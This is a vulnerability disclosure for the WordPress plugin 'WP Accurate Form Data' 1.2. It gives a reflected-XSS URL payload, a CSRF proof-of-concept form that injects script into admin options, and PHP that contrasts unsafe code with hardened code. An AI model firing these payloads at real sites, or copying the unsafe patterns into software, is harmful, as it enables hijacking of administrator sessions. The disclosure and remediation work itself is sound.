Title: WordPress 'WP Accurate Form Data' Plugin 
Version: 1.2
Author: Morten Nørtoft, Kenneth Jepsen & Mikkel Vej
Date: 2015-06-21
Download: 
- https://wordpress.org/plugins/accurate-form-data-real-time-form-validation/
- https://plugins.svn.wordpress.org/accurate-form-data-real-time-form-validation/
Notified WordPress: 2015-06-21
==========================================================

## Plugin description
==========================================================
The plugin performs e-mail and physical address validation automatically for most WordPress contact forms.

## XSS Vulnerabilities
==========================================================
The request URI is echoed into the HTML page without sanitization. This can be exploited with a malicious URL (keep in mind that most modern browsers encode special characters in the URL before sending it).

http://[URL]/wp-admin/options-general.php?page=Accu_Data_WP&a="><script>alert(1)</script>

----

The options on the admin settings page are stored and displayed without sanitization. This can be exploited with a crafted POST request.

PoC (using CSRF):

Log in as admin and submit the following form:

<form method="POST" action="http://[URL]/wp-admin/options-general.php?page=Accu_Data_WP">
	<input type="text" name="wClientKey" value="&quot;><script>alert(1)</script>"><br />
	<label>wCheckEmailValidity: </label>
	<input type="text" name="wCheckEmailValidity" value=""><br />
	<input type="text" name="wIncludeOpen" value=""><br />
	<input type="text" name="wEmailBlockAttempts" value="&quot;><script>alert(4)</script>"><br />
	<input type="text" name="wEmailFields" value="&quot;><script>alert(5)</script>"><br />
	<input type="text" name="wCheckPhysicalAddressValidity" value=""><br />
	<input type="text" name="wPhysicalAddressBlockAttempts" value="&quot;><script>alert(7)</script>"><br />
	<input type="text" name="wCityFields" value="&quot;><script>alert(8)</script>"><br />
	<input type="text" name="wZipFields" value="&quot;><script>alert(9)</script>"><br />
	<input type="text" name="wAddressFields" value="&quot;><script>alert(10)</script>"><br />
	<input type="text" name="wStateFields" value="&quot;><script>alert(11)</script>"><br />
	<input type="text" name="wCountryFields" value="&quot;><script>alert(12)</script>"><br />
	<label>wSub </label>
	<input type="text" name="wSub" value="Save Changes" readonly><br />
	<input type="submit">
</form>
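As an added illustration (not the plugin's own code), the two unsafe patterns the advisory describes are shown beside hardened equivalents built on standard WordPress APIs: an escaped, fixed form action instead of the raw request URI, and a capability check, nonce verification, input sanitization and attribute escaping around the option. The option name and page slug come from the advisory; the function names and the nonce action are assumptions.

```php
<?php
// Added illustration, not the plugin's code. Function names and the nonce
// action 'accu_save_settings' are hypothetical; 'wClientKey' and the page
// slug 'Accu_Data_WP' are taken from the advisory.

// --- Pattern 1: request URI echoed into the page ---------------------------
function accu_form_action_unsafe() {
    // Reflected XSS: the raw URI lands inside an HTML attribute unescaped.
    return '<form method="POST" action="' . $_SERVER['REQUEST_URI'] . '">';
}
function accu_form_action_safe() {
    // Build the action from a known page slug and escape it for attribute use.
    $url = admin_url( 'options-general.php?page=Accu_Data_WP' );
    return '<form method="POST" action="' . esc_url( $url ) . '">';
}

// --- Pattern 2: option stored and displayed without sanitization -----------
function accu_save_option_unsafe() {
    if ( isset( $_POST['wClientKey'] ) ) {
        update_option( 'wClientKey', $_POST['wClientKey'] ); // stored as-is
    }
}
function accu_save_option_safe() {
    // The capability check and nonce close the CSRF route; the value is
    // normalised before it is stored.
    if ( ! current_user_can( 'manage_options' ) ) {
        return;
    }
    check_admin_referer( 'accu_save_settings', 'accu_nonce' );
    if ( isset( $_POST['wClientKey'] ) ) {
        $value = sanitize_text_field( wp_unslash( $_POST['wClientKey'] ) );
        update_option( 'wClientKey', $value );
    }
}

function accu_render_field_unsafe() {
    // Stored XSS: the option text is emitted unescaped into value="...".
    return '<input type="text" name="wClientKey" value="'
        . get_option( 'wClientKey' ) . '">';
}
function accu_render_field_safe() {
    // Escape at the point of output; esc_attr() turns the advisory's
    // "><script> payload into &quot;&gt;&lt;script&gt;, so the attribute
    // cannot be broken out of. The nonce field pairs with the save handler.
    return '<input type="text" name="wClientKey" value="'
        . esc_attr( get_option( 'wClientKey' ) ) . '">'
        . wp_nonce_field( 'accu_save_settings', 'accu_nonce', true, false );
}
```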


## Solution
==========================================================
No fix available

==========================================================
XSS vulnerabilities found using Eir, an early-stage static vulnerability scanner for PHP applications.